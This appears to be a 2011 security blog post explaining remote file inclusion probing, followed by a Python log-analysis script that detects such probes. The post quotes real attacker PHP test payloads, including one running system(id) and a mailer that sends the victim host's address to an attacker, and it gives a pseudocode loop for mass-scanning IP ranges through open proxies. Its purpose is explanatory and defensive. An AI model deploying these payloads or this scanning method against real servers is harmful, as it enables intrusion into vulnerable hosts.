Wednesday, 26 October 2011

The following snippets are longer than a single line, but serve a similar purpose: testing the victims.

$ckrid="Casper";
$ckrid=$ckrid."_";
$ckrid=$ckrid."Kae";
$ckrid=$ckrid."@yahoo";
$ckrid=$ckrid.".com";
$ckrid=$ckrid."
Ckrid
";
echo($ckrid);
die($ckrid);

If your system is vulnerable, this returns "Casper_Kae@yahoo.com" and "Ckrid" as output to the attacker.


### [!] CHECK [!] ###
$C1 = "MCNHERE";
$C2 = "BOSS";
$MCN = $C1.$C2;
### [!] CHECK [!] ###
### [!] MCNID [!] ###
echo($MCN);
### [!] MCNID [!] ###
die($MCN);


/***************************************************/
/* /******* C0d3d * by * hack`**********/ */
/* /# ** ~ RoxTeam[DOT]Net Comand ~ ** #/ */
/* /_________ C0d3d _ by _ hack`________/ */
/***************************************************/
$id = system(id);
$un = @php_uname();
echo "RoxTeam";
echo "uname -a: $un";
echo "id: $id";
exit;


### [!] CHECK [!] ###
$C1 = "DGBHERE";
$C2 = "BOSS";
$DGB = $C1.$C2;
### [!] CHECK [!] ###
### [!] DGBID [!] ###
echo($DGB);
### [!] DGBID [!] ###
die($DGB);





The following is another Remote File Inclusion attack, used to test whether the attacker is able to send e-mails from your system.


// Inbox Tester 1.5
// Tester Generator
// Settings:

$mail = "fracisco.batista@googlemail.com";
$nome = "Matrixxxxx, PRIV e BKKKK";
$de = "Inbox _BK_";
$assunto = "Chegou Inboxin";
$mensagem = 'Só os fortes sobrevivem ! EKIP-PA 2010' .$_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$mensagem = stripslashes($mensagem);
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: ".$nome." <".$de.">\r\n";
if (mail($mail, $assunto, $mensagem, $headers)) {
echo " Sim ";
} else {
echo "erro";
}

One of the tests given above is saved under a name similar to one of these names. Because the test file is extremely small, it is very easy to scan thousands of IP numbers with all possible options without attracting anyone's attention. Let me try to explain it in a style that everyone can follow:

Let "OldVictim" be a host that was hacked previously (or a public file sharing service) where the test file is saved under one of these names,
"TestFile" is the file as described above,
"ProxyServer" is a host with an open web proxy service,
"RequestStrings" is the array of request strings for known buggy software,
"IPrange" is a range of IP numbers (e.g. abc.def.0.1 to abc.def.255.255)

For each of the IP numbers in IPrange, do the following:
    For each of the RequestStrings, do the following:
        Tell ProxyServer to retrieve http://IPNumber/BuggySoftware=http://OldVictim/TestFile
        If the output returned from ProxyServer equals "ShiroHige" or "FeelCoMz", save this IP somewhere for the real attack
    :End of Inner Loop
:End of Outer Loop
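
Seen from the server being scanned, the loop above leaves requests in the access log whose parameter value is itself a remote URL. The following is an added example, not part of the original post, that finds those requests and checks response bodies for the marker strings quoted on this page; it assumes Combined Log Format, and the function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Strings the test files quoted on this page print when an include succeeds.
MARKERS = ("Casper_Kae@yahoo.com", "MCNHEREBOSS", "DGBHEREBOSS",
           "RoxTeam", "ShiroHige", "FeelCoMz")
# Assumed log layout (Combined Log Format): ip - - [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.I)

def remote_include_params(target):
    """Return (name, value) pairs whose value is an absolute remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded values
        if REMOTE_URL.match(value):
            hits.append((name, value))
    return hits

def find_rfi_probes(lines):
    """Group matching requests by client IP; a scan leaves many hits per client."""
    by_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, target, status = m.groups()
        for name, value in remote_include_params(target):
            by_client[ip].append((urlsplit(target).path, name, value, int(status)))
    return dict(by_client)

def body_has_marker(body):
    """True if a response body contains one of the known test-file markers."""
    return any(marker in body for marker in MARKERS)

# Constructed sample lines (documentation addresses and hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Oct/2011:10:00:01 +0000] "GET /index.php?page=http://old-victim.example/test.txt? HTTP/1.1" 200 41',
    '198.51.100.7 - - [26/Oct/2011:10:00:02 +0000] "GET /shop/view.php?inc=http%3A%2F%2Fold-victim.example%2Ftest.txt%3F HTTP/1.1" 404 210',
    '203.0.113.9 - - [26/Oct/2011:10:00:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Oct/2011:10:00:06 +0000] "GET /go.php?next=/home&ref=search HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, hits in find_rfi_probes(SAMPLE_LOG).items():
        for path, name, value, status in hits:
            print(ip, status, path, name, value)
```

Parameters that legitimately carry URLs (redirect targets, for example) will also match, so allowlist those before alerting. Because the scan goes through an open proxy, the client IP in the log is the proxy's address, not the attacker's.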
